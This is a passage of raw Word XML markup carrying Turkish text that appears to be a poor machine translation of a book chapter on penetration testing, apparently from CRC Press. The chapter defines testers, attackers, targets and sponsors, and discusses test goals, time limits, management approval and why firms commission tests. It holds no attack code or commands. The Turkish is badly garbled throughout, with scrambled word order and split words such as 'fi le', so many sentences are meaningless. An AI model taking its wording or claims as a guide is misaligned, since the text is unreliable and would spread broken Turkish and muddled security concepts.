          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ve teknikleri aşina ise, işe ya </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kuruluşun güvenlik personeli eğitmek için bu alanda tecrübe büyük bir ile birisiyle anlaşma en iyisid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Penetrasyon Testi Ne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leri böyle bir saldırıya o sistemin veya kuruluşun direncini test etmek amacıyla bir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> sistem veya kuruluşun güvenlik </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>atlamasına tasarlanmış prosedürler resmi bir set olarak tanımlandığını olduğunu. Pe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">netrasyon testleri bir sistemin </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>zayıflıklarını ortaya çıkarmak ve sistem potansiyel saldırgan tarafından tehlikeye girebilir yollarını belirlemek için yap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leri bir test bir hedefe karşı “saldırılar” bir dizi oluşur, genel olarak, farklı biçimlerde (d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>aha sonra ele alınacaktır olan)</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>saldırıya tepki başarı veya saldırıların başarısızlığı ve nasıl testin sonucunu belirleyecekt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testinin genel amacı düşmanca bir saldırgan tarafından saldırıya dayanacak şekilde deneğin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">yeteneğini belirlemektir. Bunun </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gerçek hayatta saldırganın kullanabilir teknikler kullanılarak yapılacaktır. Bu simüle saldırı str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">atejisi keşfetmek ve gerçek bir </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>keşfeder önce güvenlik zayıf noktaları azaltmak için konuyu ve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 var sebebi kuruluşların güvenlik önlemlerinin etkinliğini belirlemek için ihtiyaç</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> vardır. onlar testleri istemek </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>güvenlik bazı de eksiklik olması (ya da keşfetmek istiyorum) olabileceğine inanı</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">yorsanız belirtir. test kendisi </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">güvenlik sorunlarını ortaya çıkarmak olabilir ancak bununla birlikte, test </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">keşfetmek ve test başarılı izin </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>süresi geçerse kaynaklandığı nedeni açıklamak için gayret gösterir. Basitçe tester has</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sas bilgiler içeren bir binadan </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>başardı belirten oluşturulmasına yeterli değildir. tester atlamalı nöbetçi bekçi vey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">a değerli veya hassas bilgileri </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>onları sağlayacak bekçi personel eğitimi eksikliğinden yetersiz ilgi nedeniyle olduğunu açıklamalı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penetrasyon testi için üç temel gereksinimleri vardır. İlk olarak, test ve belirlenen bir hedefi olmalı ve bu amaç </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">açıkça </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hedefe c daha spesifik fi o kadar kolay testin başarılı veya başarısız tanı</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">mak olacaktır. “İnternetten XYZ </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>girmeye ve araştırma departmanı fi le sunucusuna erişmek.” Gibi kesinlikle ulaşılabili</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">r ise, “XYZ şirket ağı girmeye” </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>olarak kesin değildir Her test tek bir hedefi olmalıdır. tester bir iş güvenliğind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">en çeşitli yönlerini test etmek </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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rçekleşmesini çok olduğu bir sınırlı süre olmalıdır. En penetrasyon tes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tinde metodoloji gerçek dünyada </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>saldırıların türlerini taklit etmektir. Bir saldırganın bir site sızmaya çalıştığı zam</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">an ve enerji bir sonlu miktarda </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>varsaymak mantıklıdır. O zaman bir gün ötesinde bir yıl veya arasında değişe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">bilir; O zaman ulaştıktan sonra </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>saldırganın vazgeçeceğim. Buna ek olarak, korunmakta olan bilgiler “ömür boyu” bir Batılı olarak yararlı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 kabul ve bu gerçeği kabul etmelidir. Böylece, test için hedef ifadenin pa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rçası hedeflenen sistemin türü, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>düzeyde ve bilginin ömrü dayalı makul sayılır bir zaman sınırı içer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testin konusu olan örgütün yönetim onayı olmalıdır. Sadece kurumun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> yönetim ağ ve bilgi sistemleri </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>faaliyetine izin yetkisine sahip gibi bu son derece önem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leri ile ilişkili çeşitli terimler vardır. Bu terimler penetrasyon test ve bir penetrasyon testinde yer ala</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">n kişileri ve </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tanımlamak için bu bölümde boyunca kullan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gerçekleştiren kişi veya gruptur. test amacı planlamak v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">e penetrasyon testi yürütmek ve </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sonuçlarını analiz etmektir. Birçok durumda, test testin konusu olan şirket ya da kuruluşun bir üyesi olacaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4"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nu kendisini yapmak personele veya uzmanlığa sahip değilse penetrasyon tes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ti yapmak için dışarıdan bir fi </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test cihazının gerçek hayattan versiyonudur. tester onun güvenliğini artırmak için bir firma ile çalıştığı yer Ancak, sa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ldırgan </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>kaynakları çalmak için bir şirkete karşı çalış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lirli bir hedefin güvenlik kontrollerini aşmak amacıyla test tarafından gerçekleştirilen faaliyetlerin dizis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usul, veya elektronik oluşabilmekte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olan kimi üzerine kuruluştur. konu bütün bir şirket olabilir v</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">eya bu şirket içinde daha küçük </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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penetrasyon testinin herhangi bir zamanda belirli bir saldırıya maruz sistem veya kurulu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ştur. Hedef ya da test ediliyor </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>veya olmayabilir. Her iki durumda da, hedef bu girişe karşı kendini korumak için</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> dış dünyaya sunan savunmaların </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>penetrasyon testi test etmek üzere tasarlanmıştır, bu savunmalar olduğunu. T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">am penetrasyon testi genellikle </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bir dizi yönelik saldırıların bir dizi oluşu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nde yer alan bir kuruluşun liderlik tanımlamak için kullanılan bir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> terimdir. test edilen şirketin </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>yönetimi dahil herhangi test çaba, katılan yönetimin çeşitli düzeylerde, hem d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">e bir bütün olarak şirketin üst </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>penetrasyon testi çaba dahil yönetiminin özgül seviyelerinin test kapsamı üz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">erinde doğrudan etkiye sahip </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>durumda, ancak, test adına çalıştığını varsayılır (ve sponsor) şirket içinde yönetim en az bir seviy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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">penetrasyon testi ( </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ya da daha basitçe, </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Ölçek ) </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hedef bir simüle saldırı gerçek performansı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leri veya operasyonları üzerinde gerçekleştirilen bir penetrasyon testi isteyecekt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ir çeşitli nedenleri vardır. Fi </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>örgütü yerine koyduğu güvenlik kontrollerinin etkinliğini belirlemektir. Bu kontr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">oller örgütün bilgisayarlar, ağ </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sistemleri etkileyen, doğada teknik olabilir. Bir şirket kontrol etmek yerinde ve sabit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> bilgilerinde sahiptir süreç ve </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ilişkin, doğada operasyonel olabilir. Son olarak, doğada fiziksel olabilir. tester bir </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">site veya şirket yerinde vardır </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>etkinliğini belirlemek için çalışıyor olabilir. Her durumda, test hedefi mevcut ko</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ntrolleri çevrelerindeki almaya </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tarafından fi cient Suf olup olmadığını belirlemek için olac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organizasyon belli bir tehdide sahip açığını belirlemek için çalışıyor olabilir. Her sistem, işlem vey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vunmasız hissediyor hangi tehditlerin belirli bir grubu vardır. İdeal olarak, o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rganizasyon bu tehditlere maruz </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>için adımlar atmış olacağız. test rolü bu karşı önlemlerin etkinliğini belirlemek i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">çin ve iyileştirme veya alanlar </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>belirlemek olac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RC Press LLC tarafından </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>penetrasyon testi bazen pazarda bir şirketin konumunu güçlendirmek için kullanılabilir. saygın şirket ve deneğin çevr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ayanmış olduğunu belirten tarafından yürütülen bir test, müstakbel müş</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">terilere öznenin ortamı güvenli </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>görünüm vermek için kullanılabilir. o boyutu bile ılımlı ise bir penetrasyon te</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sti deneğin ortamının tüm olası </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA0047">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
